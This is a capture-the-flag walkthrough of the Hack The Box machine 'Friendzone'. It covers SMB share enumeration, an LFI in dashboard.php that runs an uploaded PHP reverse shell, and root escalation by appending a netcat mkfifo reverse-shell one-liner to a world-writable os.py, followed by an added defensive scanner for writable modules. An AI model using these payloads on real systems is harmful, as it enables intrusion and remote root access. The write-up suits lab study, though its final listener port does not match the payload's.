HTB Friendzone - lmiyasato/lenny-hacking GitHub Wiki
- Do a full nmap scan; you will find the following ports open.
- Run enum4linux against the target; the SMB shares look interesting and show that the general and development shares are read/writable.
- Take a look at the general share using smbclient and get a copy of the creds.txt file (note: creds.txt will be used later). Also note that the development share is writable; this will be used later.
- Browsing to the friendzone website shows a basic webpage; however, interrogating it with tools like dirbuster or reading the page source was not productive.
- With DNS open, it seems worth interrogating. Initially dig does not return anything useful.
- If you look at the friendzone page, the email address gives a clue ([email protected]). Let's try that domain. I don't remember how I got the friendzone.red domain, but I think it was from all the headbanging I did trying to get an initial shell on this box.
- If you use the IP address versus the domain name, you will get different results, and likewise for http versus https. To use the domain name in the web browser, you will need to modify your hosts file:
- Navigate to the https://administrator1.friendzoneportal.red page and you will get the login screen. Log in with the creds downloaded from the "general" SMB share.
- After logging in, you will get this page, which should give you a clue.
- Now navigate to the /dashboard.php page:
- Take a closer look at the last line and replace dashboard.php with it. On closer inspection, pagename=timestamp is actually a .php file that displays the line "final access timestamp is…". To show this, I will take out the image:
- Shown below is the demonstration that the "timestamp" parameter is actually a PHP page. From the previous URL, it looks like a candidate for an LFI exploit.
- The Samba "development" share is read/writable. Upload a reverse .php shell; a sample reverse shell can easily be found on pentestmonkey.net.
- With the shell uploaded, I set the callback port to "1234", so start a netcat listener on port 1234.
- Paste the following URL in: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../etc/Development/shell
Note that launching the shell script depends on knowing the path. The share name comes from the read/writable development share, and "shell" is used without the .php because the backend PHP code appends the .php extension to whatever is passed in.
To find the actual path, the SMB enumeration script within nmap was used to find the share's mounted path on the target's local filesystem.
- Provided the listener is set up before requesting the URL, you should get a shell. From there, obtaining the user flag is trivial.
- Start a simple Python web server to transfer a tool called pspy64s to the target system.
- Now chmod the pspy64s file and run it for a minute or two. The process list will show a Python script, reporter.py, being executed by root (UID=0) every minute or two.
- The reporter.py file is editable only by root but readable by everyone. It imports the "os" module.
- Looking at the file permissions of os.py shows that it is world-writable, which lets us exploit the reporter.py script by modifying the os.py library it imports.
- Inject (append) the following code at the end of the os.py file (I forgot where I got the code from) and be sure to tweak the lhost/lport values. Appending these two lines is easier:

```python
import os
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.35 6666>/tmp/f')
```

- Copy the code to the target machine, then replace os.py with the modified os.py.
- Now start another netcat listener on port 4444 (based on the screenshot) and wait for root!
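Added here as a defender's check and not part of the original writeup: this Python script (function names are my own) walks a set of library directories, sys.path by default, and reports modules that a non-root user could modify or replace, which is exactly the condition that made reporter.py's import of os.py exploitable. It builds its own constructed sample directory so it runs stand-alone.

```python
import os
import stat
import sys
import tempfile
from pathlib import Path


def world_writable_modules(search_dirs=None):
    """Return (path, reason) pairs for importable .py files that any local
    user could modify, either directly or by replacing them in a
    world-writable, non-sticky directory. Defaults to this interpreter's
    sys.path, which is what a root cron job importing a module would use."""
    if search_dirs is None:
        search_dirs = [p for p in sys.path if p]
    findings = []
    for base in search_dirs:
        base_path = Path(base)
        if not base_path.is_dir():
            continue
        for module in base_path.rglob("*.py"):
            try:
                file_mode = module.stat().st_mode
                dir_mode = module.parent.stat().st_mode
            except OSError:
                continue
            if file_mode & stat.S_IWOTH:
                findings.append((str(module), "world-writable file"))
            elif dir_mode & stat.S_IWOTH and not dir_mode & stat.S_ISVTX:
                findings.append((str(module),
                                 "replaceable: directory is world-writable without sticky bit"))
    return findings


def build_demo_tree():
    """Constructed fixture (not from the box): a fake library directory holding
    a world-writable os.py next to a correctly permissioned module."""
    root = Path(tempfile.mkdtemp(prefix="libcheck_"))
    bad = root / "os.py"
    bad.write_text("# constructed stand-in for the writable os.py\n")
    os.chmod(bad, 0o666)  # the misconfiguration seen on the box
    good = root / "reporter_helper.py"
    good.write_text("# constructed; root-owned and 644 in the real scenario\n")
    os.chmod(good, 0o644)
    return root, bad, good


if __name__ == "__main__":
    demo_root, _, _ = build_demo_tree()
    for path, reason in world_writable_modules([str(demo_root)]):
        print(f"{path}: {reason}")
```

Running it with no arguments against the real sys.path of the interpreter that executes reporter.py is the check that would have flagged the writable os.py before it was abused.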